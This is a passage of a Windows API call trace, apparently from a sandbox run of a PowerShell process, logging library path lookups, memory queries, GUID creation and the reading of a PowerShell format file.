	[0143.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.756] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.756] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.758] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.758] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.758] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.758] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.759] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.759] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.759] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.760] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.760] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.760] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.761] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.761] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.761] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.762] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.762] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.762] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x1ef7a8b1, Data2=0x1d34, Data3=0x4a11, Data4=([0]=0x88, [1]=0x5a, [2]=0xef, [3]=0x5a, [4]=0x7, [5]=0x80, [6]=0x8b, [7]=0x70))) returned 0x0
	[0143.762] VirtualQuery (in: lpAddress=0x14b960, lpBuffer=0x14c820, dwLength=0x30 | out: lpBuffer=0x14c820*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.763] VirtualQuery (in: lpAddress=0x14b960, lpBuffer=0x14c820, dwLength=0x30 | out: lpBuffer=0x14c820*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.763] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.763] VirtualQuery (in: lpAddress=0x14b960, lpBuffer=0x14c820, dwLength=0x30 | out: lpBuffer=0x14c820*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.763] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.764] VirtualQuery (in: lpAddress=0x14b960, lpBuffer=0x14c820, dwLength=0x30 | out: lpBuffer=0x14c820*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.764] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.764] VirtualQuery (in: lpAddress=0x14b960, lpBuffer=0x14c820, dwLength=0x30 | out: lpBuffer=0x14c820*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.765] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.765] VirtualQuery (in: lpAddress=0x14b960, lpBuffer=0x14c820, dwLength=0x30 | out: lpBuffer=0x14c820*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.765] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.766] VirtualQuery (in: lpAddress=0x14b960, lpBuffer=0x14c820, dwLength=0x30 | out: lpBuffer=0x14c820*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.766] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.766] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.767] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.767] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.768] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.768] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.768] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.768] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.768] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x2bb1b97a, Data2=0x7696, Data3=0x448c, Data4=([0]=0xb3, [1]=0xc5, [2]=0x5b, [3]=0x62, [4]=0xcb, [5]=0x67, [6]=0xf4, [7]=0x9f))) returned 0x0
	[0143.769] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.769] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.770] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.770] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.770] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.770] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.864] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.864] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.864] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.865] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.865] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.865] VirtualQuery (in: lpAddress=0x14b620, lpBuffer=0x14c4e0, dwLength=0x30 | out: lpBuffer=0x14c4e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.865] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.866] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.866] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.866] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.866] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x318509d8, Data2=0xc81, Data3=0x4dbd, Data4=([0]=0xae, [1]=0x85, [2]=0x14, [3]=0xe1, [4]=0x9d, [5]=0xe8, [6]=0x92, [7]=0x12))) returned 0x0
	[0143.867] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb60251b1, Data2=0xf815, Data3=0x4dfe, Data4=([0]=0xad, [1]=0xa4, [2]=0xb4, [3]=0xd5, [4]=0xbb, [5]=0x8e, [6]=0xd5, [7]=0x66))) returned 0x0
	[0143.867] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x4d457a31, Data2=0xffd8, Data3=0x47ef, Data4=([0]=0x85, [1]=0x69, [2]=0x12, [3]=0x84, [4]=0x2e, [5]=0xe1, [6]=0x34, [7]=0xd7))) returned 0x0
	[0143.868] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x758ae96b, Data2=0x9d54, Data3=0x4db9, Data4=([0]=0xa4, [1]=0xf5, [2]=0xf, [3]=0x7e, [4]=0xa, [5]=0x48, [6]=0x71, [7]=0x91))) returned 0x0
	[0143.869] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xa6ef230, Data2=0x76b3, Data3=0x4861, Data4=([0]=0x93, [1]=0x60, [2]=0x8a, [3]=0xf9, [4]=0xca, [5]=0x4d, [6]=0x29, [7]=0x23))) returned 0x0
	[0143.869] VirtualQuery (in: lpAddress=0x14b730, lpBuffer=0x14c5f0, dwLength=0x30 | out: lpBuffer=0x14c5f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.869] VirtualQuery (in: lpAddress=0x14b7c0, lpBuffer=0x14c680, dwLength=0x30 | out: lpBuffer=0x14c680*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.869] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf7b17fe0, Data2=0x8731, Data3=0x4840, Data4=([0]=0x82, [1]=0xa3, [2]=0x71, [3]=0x77, [4]=0xde, [5]=0xb2, [6]=0xc3, [7]=0xb))) returned 0x0
	[0143.870] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb949e730, Data2=0xd9da, Data3=0x4388, Data4=([0]=0xbf, [1]=0x59, [2]=0x49, [3]=0x92, [4]=0xb8, [5]=0xed, [6]=0xa9, [7]=0x5b))) returned 0x0
	[0143.870] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb3479b4c, Data2=0x1cb9, Data3=0x4cd0, Data4=([0]=0x87, [1]=0xb, [2]=0x18, [3]=0xe0, [4]=0xbb, [5]=0xad, [6]=0xdc, [7]=0xa6))) returned 0x0
	[0143.870] SetErrorMode (uMode=0x1) returned 0x1
	[0143.871] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0143.871] SetErrorMode (uMode=0x1) returned 0x1
	[0143.871] GetFileType (hFile=0x318) returned 0x1
	[0143.871] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.872] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.872] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.873] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.873] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.874] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.874] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.874] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.874] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.875] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.875] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.875] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
